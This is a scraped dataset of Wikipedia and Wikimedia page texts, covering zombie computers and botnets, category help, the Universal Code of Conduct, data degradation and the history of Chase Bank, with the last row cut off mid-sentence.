145 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Zombie_(computing) | In computing, a zombie is a computer connected to the Internet that has been compromised by a hacker via a computer virus, computer worm, or trojan horse program and can be used to perform malicious tasks under the remote direction of the hacker. Zombie computers often coordinate together in a botnet controlled by the hacker, and are used for activities such as spreading e-mail spam and launching distributed denial-of-service attacks (DDoS attacks) against web servers. Most victims are unaware that their computers have become zombies. The concept is similar to the zombie of Haitian Voodoo folklore, which refers to a corpse resurrected by a sorcerer via magic and enslaved to the sorcerer's commands, having no free will of its own. 1 A coordinated DDoS attack by multiple botnet machines also resembles a "zombie horde attack", as depicted in fictional zombie films. Zombie computers have been used extensively to send e-mail spam; as of 2005, an estimated 50 80% of all spam worldwide was sent by zombie computers. 2 This allows spammers to avoid detection and presumably reduces their bandwidth costs, since the owners of zombies pay for their own bandwidth. This spam also greatly increases the spread of Trojan horses, as Trojans are not self-replicating. They rely on the movement of e-mails or spam to grow, whereas worms can spread by other means. 3 For similar reasons, zombies are also used to commit click fraud against sites displaying pay-per-click advertising. Others can host phishing or money mule recruiting websites. Zombies can be used to conduct distributed denial-of-service (DDoS) attacks, a term which refers to the orchestrated flooding of target websites by large numbers of computers at once. The large number of Internet users making simultaneous requests of a website's server is intended to result in crashing and the prevention of legitimate users from accessing the site. 4 A variant of this type of flooding is known as distributed degradation-of-service. Committed by "pulsing" zombies, distributed degradation-of-service is the moderated and periodical flooding of websites intended to slow down rather than crash a victim site. The effectiveness of this tactic springs from the fact that intense flooding can be quickly detected and remedied, but pulsing zombie attacks and the resulting slow-down in website access can go unnoticed for months and even years. 5 The computing facilitated by the Internet of Things (IoT) has been productive for modern-day usage, yet it has played a significant role in the increase in web attacks. The potential of IoT enables every device to communicate efficiently, but this also intensifies the need for policy enforcement regarding security threats. Among these threats, Distributed Denial-of-Service (DDoS) attacks are prevalent. Research has been conducted to study the impact of such attacks on IoT networks and to develop compensating provisions for defense. 6 Consultation services specialized in IoT security, such as those offered by IoT consulting firms, play a vital role in devising comprehensive strategies to safeguard IoT ecosystems from cyber threats. Notable incidents of distributed denial- and degradation-of-service attacks in the past include the attack upon the SPEWS service in 2003, and the one against Blue Frog service in 2006. In 2000, several prominent Web sites (Yahoo, eBay, etc.) were clogged to a standstill by a distributed denial of service attack mounted by 'MafiaBoy', a Canadian teenager. Beginning in July 2009, similar botnet capabilities have also emerged for the growing smartphone market. Examples include the July 2009 in the "wild" release of the Sexy Space text message worm, the world's first botnet capable SMS worm, which targeted the Symbian operating system in Nokia smartphones. Later that month, researcher Charlie Miller revealed a proof of concept text message worm for the iPhone at Black Hat Briefings. Also in July, United Arab Emirates consumers were targeted by the Etisalat BlackBerry spyware program. In the 2010s, the security community is divided as to the real world potential of mobile botnets. But in an August 2009 interview with The New York Times, cyber security consultant Michael Gregg summarized the issue this way: "We are about at the point with smart phones that we were with desktops in the '80s. 7 |
146 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Category | Categories are intended to group together pages on similar subjects. They are implemented by a MediaWiki feature that adds any page with a text like Category:XYZ in its wiki markup to the automated listing that is the category with name XYZ. Categories help readers to find, and navigate around, a subject area, to see pages sorted by title, and to thus find article relationships. Categories are normally found at the bottom of an article page. Clicking a category name brings up a category page listing the articles (or other pages) that have been added to that particular category. There may also be a section listing the subcategories of that category. The subcategorization feature makes it possible to organize categories into tree-like structures to aid navigation. The term category does refer to both the title of a category page—the category pagename—and the category itself. Keeping this in mind while reading about categorization, plus learning a category page layout is a worthwhile investment in research techniques. (See also the search box parameter "incategory".) The layout of a category page is mostly text, but see about displaying category trees below. The MediaWiki software maintains tables of categories, to which any editable page can be added. To add a page to a category, include Category:Category name or Category:Category name Sortkey in that page's wiki markup. The categories to which a page belongs appear in a box at the bottom of the page. A category is usually associated with a category page in the "Category: namespace. 1 A category page contains text that can be edited, like any other page, but when the page is displayed, the last part of what is displayed is an automatically generated list of all pages in that category, in the form of links. Other category pages which appear in this list are treated separately, as subcategories. A category page is any page in the Category namespace. They each act as a category, and are termed a "category". The category page has one section titled Subcategories listing other "categories", and one section titled Pages, listing pages as categorized (in other namespaces). New categories are created by creating a page in the Category namespace. A category page can be edited like any other page. However, when it is displayed, the editable part of the page is followed by automatically generated lists of pages belonging to the category, as follows: The items in the lists all link to the pages concerned; in the case of the images this applies both to the image itself and to the text below it (the name of the image). For the way in which the lists are ordered, see Sorting category pages below. The first and second lists are divided into sections, according to the first character of the sort key. These initial characters are displayed above the sections. To suppress these, make all sort keys start with a space. A category page can only display a limited number of items (currently 200). If more pages belong to the category, there will be a link to the next ones. The categories box for the category page appears at the bottom, in the same place as for other pages. This contains the categories to which the current category page has been added, i.e., its parent categories (the categories of which it is a subcategory). Add a category page to other categories in the normal way, using the Category:Category name or Category:Category name Sortkey syntax. A page becomes part of a category if the page's wiki markup contains a declaration for that category. A category declaration takes the form Category:Category name or Category:Category name Sortkey . The declaration must be processed, i.e. it will not work if it appears between nowiki ... nowiki or includeonly ... includeonly tags, or in a comment. The declaration may however come from a transcluded page; see Categories and templates below. A category name can be any string that would be a legitimate page title. If the category name begins with a lower-case letter, it will be capitalized. For initial lower-case letters, as in Category:macOS, see the technical restrictions page. On Wikipedia, it is customary to place category declarations at the end of the wiki markup, but before any stub templates (which themselves transclude categories) and interlanguage links. When a page has been added to one or more categories, a categories box appears at the bottom of the page (or possibly elsewhere, if a non-default skin is being used). This box contains a list of the categories the page belongs to, in the order in which the category declarations appear in the processed wiki markup. The category names are linked to the corresponding category pages. They appear as red links if the corresponding category page does not exist. If a user has enabled the HotCat gadget, the categories box will also provide links to quickly add, remove, or modify category declarations on the page, without having to edit the whole page. Hidden categories are not displayed, except as described below under Hiding categories. The following subsections are ordered from simple actions to more elaborate or rarer actions. To link to a category page without putting the current page in that category, precede the link with a colon: :Category:Category name . Such a link can be piped like a normal wikilink. (The cl template, and others listed on its documentation page, may sometimes be helpful.) Raw information about the members of a category, their sort keys and timestamps (time when last added to the category) can be obtained from the API, using a query of the form: Listings of up to 500 members are possible. If there are more members then the results will include text near the end like this: categorymembers cmcontinue "page NNNN TITLE" . This can be added to the previous one, without quotation marks, for the next page of members: ... cmcontinue page NNNN TITLE By default, a page is sorted under the first character of its name, without the namespace. English Wikipedia groups accented characters together with their unaccented version, so pages starting with , , , will be listed under heading A. Sorting is case-insensitive, so "ABC" comes after "Abacus". Unlike at Special:Allpages and Special:Prefixindex, a space is treated as a space (coming before all other characters), not as an underscore. The English Wikipedia has numerical sorting in categories. This means a page whose title begins with a number will be sorted according to the numeric value of the number (even if it is multiple digits). Thus "9 dogs", "25 dogs", and "112 dogs" will all appear under the "0 9" heading in numeric order. If the number includes a comma, space, or period, the sorting algorithm will only consider the part of the number before the separator. Each of the three lists (subcategories, pages, media files) is arranged in the order explained above (except that, in the subcategories list, the namespace indicator "Category: is not considered). If an item ought to be positioned within a list on the basis of an alternative name (sort key) for that item, then this can be specified in the category tag that places the item in the list: For example, to add an article called Albert Einstein to Category:1879 births and have the article sorted by "Einstein, Albert", you would type: Unlike a piped link (which uses the same syntax), the sort key itself is not displayed to readers. It affects only the order in which pages are listed on the category page. It is useful to document the system being used for sort keys on the category page. For guidelines about the use of sort keys on Wikipedia, see WP:SORTKEY. It is possible to set a default sort key which is different from PAGENAME by using the magic word DEFAULTSORT: : This is often used in biography articles, to make sure the subject is sorted by their last name: For example, on the Albert Einstein page, DEFAULTSORT:Einstein, Albert adds the sort key "Einstein, Albert" to all his categories, such as Category:1879 births. In the case of multiple default sort key tags, the last DEFAULTSORT on the final rendering of a page applies for all categories, regardless of the position of the category tags. This also means that a DEFAULTSORT tag included from a template is not effective if another DEFAULTSORT tag occurs later on the page, even if the later DEFAULTSORT tag is also "hidden" (included by another template). If a category is added inside ref ... ref then DEFAULTSORT may be ignored. In addition to browsing through hierarchies of categories, it is possible to use the search tool to find specific articles in specific categories. To search for articles in a specific category, type incategory:"CategoryName" in the search box. A pipe can be added to join the contents of one category with the contents of another. For example, enter to return all pages that belong to either (or both) of the categories, as here. Note that using search to find categories will not find articles which have been categorized using templates. This feature also doesn't return pages in subcategories. Special:Categories provides an alphabetic list of all categories, with the number of members of each; this number does not include the content of the subcategories, but it includes the subcategories themselves, i.e., each counting as one. The above list contains all categories that have members, regardless of whether they have corresponding category pages. To list all existing category pages (regardless of whether they have members), use Special:AllPages Category:. As described at mw:Help:Magic words, PAGESINCATEGORY:Example or PAGESINCAT:Example returns the number of pages in "Category:Example". Each subcategory counts as one page; pages in subcategories are not counted. The page Special:CategoryTree enables you to see the tree structure of a category (its subcategories, their subcategories and so on; the display of files and other member pages is optional). The CategoryTree extension can be used to display such a tree on any page. (This is sometimes done on the category page itself, if the category is split over multiple screens, to make all subcategories available on every screen.) The basic syntax is to display just the subcategory tree, and to display member pages as well. They will be indicated by italics. Dapete's category-visualizer vCat will render charts of the tree structure. You may also use Template:Category tree or Template:Category tree all, instead. Warning: Categories can be moved in the same way as an ordinary page; but a certain amount of cleanup may be necessary. A redirect is left at the old category name, and this is not a normal REDIRECT ... but a category redirect . Once all the pages have been moved out of the old category, it may be left as a category redirect or deleted. For categories entirely populated through templates (see above), modifying the templates enables all affected articles to be moved to another category, but with the refresh problem mentioned. Almost all category name changes are made pursuant to a consensus decision at Wikipedia:Categories for discussion. Do not create intercategory redirects other than with a category redirect template. See Wikipedia:Categories for discussion Redirecting categories for more on category redirects. When the magic word HIDDENCAT is placed on a category page, that category becomes hidden, meaning that it will not be displayed on the pages belonging to that category. On Wikipedia, the magic word is not normally used explicitly, but is applied through the hidden category template. The feature is mostly used to prevent project maintenance categories from showing up to ordinary readers on article pages. For users who are not logged in, hidden categories are displayed on category pages (whether as parent categories or subcategories). Hidden categories are displayed at the bottom of each page, after "Hidden categories: , for registered users: Hidden categories are automatically added to Category:Hidden categories. For guidelines on the hiding of categories on Wikipedia, see WP:HIDDENCAT. The most effective way of finding entries of a category is using the "What links here" tool on the category's main article. An easy way to find relevant articles for a new category or missing entries in an existing one is by finding the most relevant list and checking its entries. Sometimes categories are about things that are intersections of other categories for which the PetScan tool can be used. More relevant articles may also be found linked in a category's main article and the articles already featured in the category especially in their "See also" sections (if existent) and the automatically suggested "RELATED ARTICLES" below them. Furthermore, a category's superordinate categories often feature articles that should be subcategorized to the category. Other ways to find relevant articles include searching Wikipedia for the category's topic and searching the Web for the topic in quotes (with synonyms also in quotes and appended after an OR) and appending the word wiki or Wikipedia or site:Wikipedia.org to them. Templates are categorized the same way as articles, except that Category: Some-topic templates should be placed on the template's documentation page (or inside noinclude ... noinclude tags, if there is no documentation page), this is necessary to avoid categorizing pages by template inclusion (see below). A template can be used to add pages to a category, usually by placing the category link inside includeonly includeonly tags on the template (e.g. includeonly Category:category name includeonly ). When the template is transcluded into the page, the category link becomes active, and the page is added to the category page. This is useful for categories that have high turnover or many pages included, like cleanup categories. Changes to the template, however, may not be reflected immediately on the category page. When you edit an article to add a category tag directly, the list of category members is updated immediately when the page is saved. When a category link is contained in a template, however, this does not happen immediately: instead, whenever a template is edited, all the pages that transclude it are put into the job queue to be recached during periods of low server load. This means that, in busy periods, it may take hours or even days before individual pages are recached and they start to appear in the category list. Performing a null edit to a page will allow it to jump the queue and be immediately recached. To add the template itself to the category page as well, omit the "includeonly" tags. To add the template to a category without categorizing pages on which the template is transcluded, place the category declaration between noinclude ... noinclude tags, or add it to the template documentation page between includeonly includeonly (the latter allows recategorizing the template without editing it, which is helpful if it is protected, or so complicated that mere mortals hesitate to touch it). Parser functions can be used to make the transcluded categories, or the sort key used in them, dependent on other variables, notably PAGENAME. On Wikipedia it is not recommended that templates be used to populate ordinary content categories of articles. See Categorization using templates in the categorization guideline. Redirect pages can be categorized and there are conventions on how to do it. The redirect link must be first on the page. On a category page, redirects are listed in italics. For a category, the "Related Changes" feature, when applied to the corresponding category page, lists recent changes to the pages which are currently listed as belonging to a category. Where those pages are subcategories or image pages, only changes to their editable parts are listed. Notice that "Related Changes" does not show edits to pages that have been removed from the category. Also, "Related Changes" does not list recent changes to pages linked from the editable part of the category page (as it would normally, with a non-category page). If a workaround would be required, the links in question could be placed in a template and transcluded onto the category page. As usual unlike with watchlists recent changes to corresponding talk pages are not shown under "Related Changes". Pages one is watching are bolded on the list. This can help to find which pages in a given category one has on one's watchlist. The DynamicPageList (third-party) extension provides a list of last edits to the pages in a category, or optionally, just the list of pages; the simpler DynamicPageList (Wikimedia) is installed on Meta, Wikinews, Wikibooks and Wikiversity; the extension mw:Extension:DPLforum is installed on Wikia. Since 2016, additions and removals from categories are available via the "Category changes" filter on recent changes pages, including watchlists and Special:RecentChangesLinked. For example, category changes to articles in Category:Cannabis stubs can be found here. You can monitor additions and removals from specific categories by adding the categories to your watchlist and making sure the "Category changes" filter is active. You can view changes to categories in your watchlist by clicking here. Additional scripts with similar functionality are User:CategoryWatchlistBot and User:Ais523 catwatch. |
147 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project.Per resolution by the Foundation's Board, the Universal Code of Conduct (UCoC) applies to all Wikimedia projects and spaces as well as Foundation activities, including events it hosts and events it funds or supports with other resources. We believe in empowering as many people as possible to actively participate in Wikimedia projects and spaces, to reach our vision of a world in which everyone can share in the sum of all human knowledge. We believe our communities of contributors should be as diverse, inclusive, and accessible as possible. We want these communities to be positive, safe and healthy environments for anyone who joins (and wants to join) them. We are committed to ensuring that it remains so, including by embracing this Code of Conduct and revisiting for updates as needed. Also, we wish to protect our projects against those who damage or distort the content. In line with the Wikimedia mission, all who participate in Wikimedia projects and spaces will: This Universal Code of Conduct (UCoC) defines a minimum set of guidelines of expected and unacceptable behaviour. It applies to everyone who interacts and contributes to online and offline Wikimedia projects and spaces. This includes new and experienced contributors, functionaries within the projects, event organizers and participants, employees and board members of affiliates and employees and board members of the Wikimedia Foundation. It applies to all Wikimedia projects, technical spaces, in-person and virtual events, as well as the following instances: The Universal Code of Conduct provides a baseline of behaviour for collaboration on Wikimedia projects worldwide. Communities may add to this to develop policies that take account of local and cultural context, while maintaining the criteria listed here as a minimum standard. The Universal Code of Conduct applies equally to all Wikimedians without any exceptions. Actions that contradict the Universal Code of Conduct can result in sanctions. These may be imposed by designated functionaries (as appropriate in their local context) and or by the Wikimedia Foundation as the legal owner of the platforms. Every Wikimedian, whether they are a new or experienced editor, a community functionary, an affiliate or Wikimedia Foundation board member or employee, is responsible for their own behaviour. In all Wikimedia projects, spaces and events, behaviour will be founded in respect, civility, collegiality, solidarity and good citizenship. This applies to all contributors and participants in their interaction with all contributors and participants, without exceptions based on age, mental or physical disabilities, physical appearance, national, religious, ethnic and cultural background, caste, social class, language fluency, sexual orientation, gender identity, sex or career field. Nor will we make exceptions based on standing, skills or accomplishments in the Wikimedia projects or movement. We expect all Wikimedians to show respect for others. In communicating with people, whether in online or offline Wikimedia environments, we will treat each other with mutual respect. This includes but is not limited to: We strive towards the following behaviours: This includes but is not limited to: The Universal Code of Conduct aims to help community members identify situations of bad behaviour. The following behaviours are considered unacceptable within the Wikimedia movement: This includes any behaviour intended primarily to intimidate, outrage or upset a person, or any behaviour where this would reasonably be considered the most likely main outcome. Behaviour can be considered harassment if it is beyond what a reasonable person would be expected to tolerate in a global, intercultural environment. Harassment often takes the form of emotional abuse, especially towards people who are in a vulnerable position, and may include contacting workplaces or friends and family members in an effort to intimidate or embarrass. In some cases, behaviour that would not rise to the level of harassment in a single case can become harassment through repetition. Harassment includes but is not limited to: Abuse occurs when someone in a real or perceived position of power, privilege, or influence engages in disrespectful, cruel, and or violent behaviour towards other people. In Wikimedia environments, it may take the form of verbal or psychological abuse and may overlap with harassment. Deliberately introducing biased, false, inaccurate or inappropriate content, or hindering, impeding or otherwise hampering the creation (and or maintenance) of content. This includes but is not limited to: |
148 | https://en.wikipedia.org/wiki/Data_scraping | https://developer.wikimedia.org | Find technical documentation, and connect with the developer community behind Wikipedia and other Wikimedia projects. Get started Access articles from Wikipedia, media files, structured data, and more with public APIs and downloads. Tools and bots make it easier to edit and maintain Wikimedia projects. Help build the Wikimedia ecosystem with open source software. Get involved with the Wikimedia technical community, and find opportunities for support and learning. Find resources to help with questions and troubleshooting. |
149 | https://en.wikipedia.org/wiki/Web_scraping | https://zh.wikipedia.org/wiki/%E7%BD%91%E9%A1%B5%E6%8A%93%E5%8F%96 | web scraping HTML Web |
150 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_degradation | Data degradation is the gradual corruption of computer data due to an accumulation of non-critical failures in a data storage device. It is also referred to as data decay, data rot or bit rot. 1 This results in a decline in data quality over time, even when the data is not being utilized. Data degradation in dynamic random-access memory (DRAM) can occur when the electric charge of a bit in DRAM disperses, possibly altering program code or stored data. DRAM may be altered by cosmic rays 2 or other high-energy particles. Such data degradation is known as a soft error. 3 ECC memory can be used to mitigate this type of data degradation. 4 Data degradation results from the gradual decay of storage media over the course of years or longer. Causes vary by medium: Below are several digital images illustrating data degradation, all consisting of 326,272 bits. The original photo is displayed first. In the next image, a single bit was changed from 0 to 1. In the next two images, two and three bits were flipped. On Linux systems, the binary difference between files can be revealed using cmp command (e.g. cmp -b bitrot-original.jpg bitrot 1bit-changed.jpg). This deterioration can be caused by a variety of factors that impact the reliability and integrity of digital information, including physical factors, software errors, security breaches, human error, obsolete technology, and unauthorized access incidents. 12 13 14 15 Most disk, disk controller and higher-level systems are subject to a slight chance of unrecoverable failure. With ever-growing disk capacities, file sizes, and increases in the amount of data stored on a disk, the likelihood of the occurrence of data decay and other forms of uncorrected and undetected data corruption increases. 16 Low-level disk controllers typically employ error correction codes (ECC) to correct erroneous data. 17 Higher-level software systems may be employed to mitigate the risk of such underlying failures by increasing redundancy and implementing integrity checking, error correction codes and self-repairing algorithms. 18 The ZFS file system was designed to address many of these data corruption issues. 19 The Btrfs file system also includes data protection and recovery mechanisms, 20 as does ReFS. 21 |
151 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Chase_Bank | JPMorgan Chase Bank, N.A., doing business as Chase, is an American national bank headquartered in New York City that constitutes the consumer and commercial banking subsidiary of the U.S. multinational banking and financial services holding company, JPMorgan Chase. The bank was known as Chase Manhattan Bank until it merged with J.P. Morgan Co. in 2000. 2 Chase Manhattan Bank was formed by the merger of the Chase National Bank and the Manhattan Company in 1955. 3 The bank merged with Chemical Bank New York in 1996 and later merged with Bank One Corporation in 2004 4 and in 2008 acquired the deposits and most assets of Washington Mutual. In May 2023, it acquired the assets of First Republic Bank. Chase offers more than 5,100 branches and 17,000 ATMs nationwide and has 18.5 million checking accounts and 25 million debit card users as of 2023. 5 JPMorgan Chase Co. has 250,355 employees (as of 2016) and operates in more than 100 countries. JPMorgan Chase Co. had assets of $3.31 trillion in 2022 which makes it the largest bank in the United States 6 as well as the bank with the most branches in the United States 7 and the only bank with a presence in all of the contiguous United States. 8 JPMorgan Chase, through its Chase subsidiary, is one of the Big Four banks of the United States. 9 10 The Bank of The Manhattan Company (New York) was founded on September 1, 1799, and continued under that name until 1955, when it merged with the Chase National Bank, which was founded in 1877; the merged bank was called The Chase Manhattan Bank. 11 12 Chase traces its history back to the founding of The Manhattan Company by Aaron Burr on September 1, 1799, in a house at 40 Wall Street: 2 After an epidemic of yellow fever in 1798, during which coffins had been sold by itinerant vendors on street corners, Aaron Burr established the Manhattan Company, with the ostensible aim of bringing clean water to the city from the Bronx River but in fact, designed as a front for the creation of New York's second bank, rivaling Alexander Hamilton's Bank of New York. In 2006, the modern-day Chase bought the retail banking division of the Bank of New York, which then only months later merged with Pittsburgh-based Mellon Financial to form the present-day BNY Mellon. 15 16 : 23 26 Chase National Bank was formed in 1877 by John Thompson. 2 It was named after former United States Treasury Secretary and Chief Justice Salmon P. Chase, 3 although Chase (having died four years earlier) did not have a connection with the bank. 2 The Chase National Bank acquired a number of smaller banks in the 1920s through its Chase Securities Corporation. In 1926, for instance, it acquired Mechanics and Metals National Bank. However, its most significant acquisition was that of the Equitable Trust Company of New York in 1930, the largest stockholder of which was John D. Rockefeller Jr. 17 This made Chase the largest bank in the US and the world. Chase was primarily a wholesale bank dealing with other prominent financial institutions and major corporate clients such as General Electric, 18 : 450 which had, through its RCA subsidiary, leased prominent space and become a crucial first tenant of Rockefeller Center. They rescued that major project in 1930. The bank is also closely associated with and has financed the oil industry, having longstanding connections with its board of directors to the successor companies of Standard Oil, especially ExxonMobil, which are also part of Rockefeller holdings. citation needed In 1955, Chase National Bank and The Manhattan Company merged to create the Chase Manhattan Bank. 2 As Chase was a much larger bank, it was first intended that Chase acquire the "Bank of Manhattan", as it was nicknamed, but it transpired that Burr's original charter for the Manhattan Company had not only included the clause allowing it to start a bank with surplus funds, but another requiring unanimous consent of shareholders for the bank to be taken over. The deal was therefore structured as an acquisition by the Bank of the Manhattan Company of Chase National, with John J. McCloy becoming chairman of the merged entity. This avoided the need for unanimous consent by shareholders. For Chase Manhattan Bank's new logo, Chermayeff Geismar designed a stylized octagon in 1961, which remains part of the bank's logo today. 19 It has been reported that the Chase logo was a stylized representation of the primitive water pipes laid by the Manhattan Company, 20 but this story was refuted in 2007 by Ivan Chermayeff himself. According to Chermayeff, the Chase logo was merely intended to be distinctive and geometric, and was not intended at all to resemble a cross-section of a wooden water pipe. 21 According to Chase, the sides of the octagon represent forward motion, while the blank space in the middle suggests progress originates from the center; and is a single unit made up of separate parts, like the bank. 22 The bank included an asset management business called the Chase Investors Management Corporation. Under McCloy's successor, George Champion, the bank relinquished its antiquated 1799 state charter for a modern one. In 1969, under the leadership of David Rockefeller, the bank reorganized as a bank holding company, the Chase Manhattan Corporation. 3 The mergers and acquisitions during this period allowed Chase Manhattan to expand its influence over many non-financial corporations. A 1979 study titled "The Significance of Bank Control over Large Corporations" 23 found that: "The Rockefeller-controlled Chase Manhattan Bank tops the list, controlling 16 companies. In 1985, Chase Manhattan expanded into Arizona by acquiring Continental Bank. 24 In 1991, Chase Manhattan expanded into Connecticut by acquiring two insolvent banks. 25 In August 1995, Chemical Bank of New York and Chase Manhattan Bank announced plans to merge. 26 The merger was completed in August 1996. 27 Chemical's previous acquisitions included Manufacturers Hanover Corporation, in 1991, and Texas Commerce Bank, in 1987. Although Chemical was the nominal survivor, the merged company retained the Chase name since not only was it better known (particularly outside the United States), but also the original charter of Chase required that the name be retained in any future business ventures. Hence, even today, it is known as JPMorgan Chase. In December 2000, the combined Chase Manhattan completed the acquisition of J.P. Morgan Co. in one of the largest banking mergers to date. The combined company was renamed JPMorgan Chase. In 2004, the bank acquired Bank One, making Chase the largest credit card issuer in the United States. JPMorgan Chase added Bear Stearns and Washington Mutual to its acquisitions in 2008 and 2009 respectively. After closing nearly 400 overlapping branches of the combined company, less than 10% of its total, Chase will have approximately 5,410 branches in 23 states as of the closing date of the acquisition. 28 29 According to data from SNL Financial (data as of June 30, 2008), this places Chase third behind Wells Fargo and Bank of America in terms of total U.S. retail bank branches. In October 2010, Chase was named in two lawsuits alleging manipulation of the silver market. 30 The suits allege that by managing giant positions in silver futures and options, the banks influenced the prices of silver on the New York Stock Exchange's Comex Exchange since early 2008. The following is an illustration of the company's major mergers and acquisitions and historical predecessors to 1995 (this is not a comprehensive list): The Chemical Bank of New York(est. 1823) Texas Commerce Bank(Formerly Texas National Bank of Commerce)(merged 1864) ManufacturersTrust Company(est. 1905) Hanover Bank(est. 1873) Bank of the Manhattan Company(est. 1799) Chase National Bankof the City of New York(est. 1877) In 2004, JPMorgan Chase merged with Chicago-based Bank One Corp., bringing on board its current chairman and CEO Jamie Dimon as president and COO and designating him as CEO William B. Harrison Jr.'s successor. Dimon's pay was pegged at 90% of Harrison's. Dimon quickly made his influence felt by embarking on a cost-cutting strategy and replaced former JPMorgan Chase executives in key positions with Bank One executives—many of whom were with Dimon at Citigroup. Dimon became CEO in January 2006 and chairman in December 2006 after Harrison's resignation. 31 Bank One Corporation was formed upon the 1998 merger between Banc One of Columbus, Ohio and First Chicago NBD. These two large banking companies were themselves created through the merger of many banks. JPMorgan Chase completed the acquisition of Bank One in Q3 2004. The merger between Bank One and JPMorgan Chase meant that corporate headquarters were now in New York City while the retail bank operations of Chase were consolidated in Chicago. 32 33 The following is an illustration of Bank One's major mergers and acquisitions and historical predecessors (this is not a comprehensive list): City National Bank Trust Company (Columbus, Ohio) Farmers Saving Trust Company First Chicago Corp(est. 1863) NBD Bancorp(Formerly National Bank of Detroit)(est. 1933) Louisiana's FirstCommerce Corp. On September 25, 2008, JPMorgan Chase bought most banking operations of Washington Mutual from the receivership of the Federal Deposit Insurance Corporation (FDIC). 34 : 115 That night, the Office of Thrift Supervision, in what was by far the largest bank failure in American history, seized Washington Mutual Bank and placed it into receivership. The FDIC sold the bank's assets, secured debt obligations and deposits to JPMorgan Chase Bank, NA for $1.888 billion, which re-opened the bank the following day. As a result of the takeover, Washington Mutual shareholders lost all their equity. 35 Through the acquisition, JPMorgan became owner of the former accounts of Providian Financial, a credit card issuer WaMu acquired in 2005. The company completed the rebranding of Washington Mutual branches to Chase in late 2009. In the first quarter of 2006, Chase purchased Collegiate Funding Services, a portfolio company of private equity firm Lightyear Capital, for $663 million. CFS was used as the foundation for the Chase Student Loans, previously known as Chase Education Finance. 36 In April of that same year, Chase acquired the Bank of New York Co.'s retail and small business banking network. This gave Chase access to 338 additional branches and 700,000 new customers in New York, New Jersey, Connecticut, and Indiana. 37 In 2019, Chase began opening retail branches in Pittsburgh and other areas within Western Pennsylvania; this coincided with Bank of America starting a similar expansion within the area the previous year. 38 Even though Chase entered the market organically as opposed to a merger acquisition, they still had to receive approval from the Office of the Comptroller of the Currency to open branches due to Chase's size as a whole. 39 Before Chase and Bank of America expanded its retail presence into the market, Pittsburgh had been one of the largest U.S. cities without a retail presence from any of the "Big Four", with locally based PNC Financial Services (no. 6 nationally) having a commanding market share in the area. Chase had previously considered buying National City branches from PNC that were required for divesture following that bank's acquisition of National City in 2009, but were instead sold to First Niagara Bank (since absorbed into KeyBank); it had been speculated that PNC intentionally sold the branches to a much smaller competitor due to not wanting to compete with a "Big Four" bank in its home market. 40 In August 2021, Chase announced that it was the first bank to have a retail presence in all 48 of the contiguous United States. The last state in the US to have a Chase branch was Montana, with the branch in Billings the first branch in the state. 41 42 In September 2021, JPMorgan Chase entered the United Kingdom retail banking market by launching an app-based current account and Deposit account under the Chase brand. This is the company's first retail banking operation outside of the United States. 43 44 45 A press release from the National Archives and Records Administration (NARA) in 2004 announced that many of the new Federal Bureau of Investigation (FBI) files had become declassified. This declassification enabled the discovery that before and during the early years of World War II, the German government sold a special kind of Reichsmark, known as R ckwanderer returnee Marks, to American citizens of German descent. Chase National Bank, along with other businesses, were involved in these transactions. Through Chase, this allowed Nazi sympathizers to purchase Marks with dollars at a discounted rate. Specifically, "The financial houses understood that the German government paid the commissions (to its agents, including Chase) through the sale of discounted, blocked Marks that came mainly from Jews who had fled Germany. In other words, Nazi Germany was able to offer these Marks below face-value because they had been stolen from migr s fleeing the Nazi regime. Between 1936 and 1941, the Nazis amassed over $20 million, and the businesses enabling these transactions earned $1.2 million in commissions. Of these commissions, over $500,000 went to Chase National Bank and its subagents. These facts were discovered when the FBI began its investigation in October 1940. The purpose of the investigation was to follow German-Americans who had bought the Marks. However, Chase National Bank's executives were never federally prosecuted because Chase's lead attorney threatened to reveal FBI, Army, and Navy "sources and methods" in court. citation needed Publicly naming the sources and methods could have posed security risks and threatened future intelligence gathering. To avoid such revelations, the executives' violations of the Johnson Act, the Espionage Act, and the Foreign Agents Registration Act were never prosecuted. 46 47 48 Besides the controversial R ckwanderer Mark Scheme, NARA records also revealed another controversy during the occupation of France by the Nazis. From the late 1930s until June 14, 1941, when President Franklin D. Roosevelt (FDR) issued an Executive Order freezing German assets, Chase National Bank worked with the Nazi government. The order blocking any access to French accounts in the U.S. by anyone, but especially by the Nazis was issued by Secretary of the Treasury, Henry Morgenthau Jr., with the approval of FDR. Within hours of the order, Chase unblocked the accounts and the funds were transferred through South America to Nazi Germany. 48 U.S. Treasury officials wanted an investigation of French subsidiaries of American banks, including: Chase Bank, J.P. Morgan Co, National City Corporation, Guaranty Bank, Bankers Trust, and American Express. Of these banks, only Chase and Morgan remained open in France during the Nazi occupation. The Chase branch chief in Paris, France, Carlos Niedermann, told his supervisor in New York that there had been an "expansion of deposits". Also, Niedermann was, "very vigorous in enforcing restrictions against Jewish property, even going so far as to refuse to release funds belonging to Jews in anticipation that a decree with retroactive provisions prohibiting such release might be published in the near future by the occupying Nazi authorities" citation needed . In 1998, Chase general counsel William McDavid said that Chase did not have control over Niedermann. Whether that claim was true or not, Chase Manhattan Bank acknowledged seizing about 100 accounts during the Vichy regime. Kenneth McCallion, a partner in the New York firm Goodkind Labaton Rudoff Sucharow, 49 led a lawsuit against Barclays Bank for the illegal seizure of assets during World War Two and has since turned his attention toward Chase. The World Jewish Congress (WJC), entered into discussions with Chase and a spokesperson for the WJC said, "Nobody at Chase today is guilty. They were not involved in whatever happened, but they do accept that they have an institutional responsibility. A Chase spokesman said, "This is a moral issue that we take very seriously. Chase general counsel McDavid added, "that Chase intends to compensate Jewish account holders whose assets were illegally plundered". In 1999, the French government formed a commission to report findings to Prime Minister Lionel Jospin. Claire Andrieu, a commission member and history professor at the Sorbonne, said that under the Vichy regime, French banks received visits from Nazi officials but U.S. banks did not. At that time, they did not have to report Jewish accounts, but they did just as the French banks did. She goes on to say that an American ambassador protected the U.S. subsidiaries. 50 51 52 In May 1999, Chase Manhattan reached a settlement with 20 plaintiffs who filed an asset reparations lawsuit, such as the Claims Conference, a Jewish restitution organization, and the WJC. 53 The 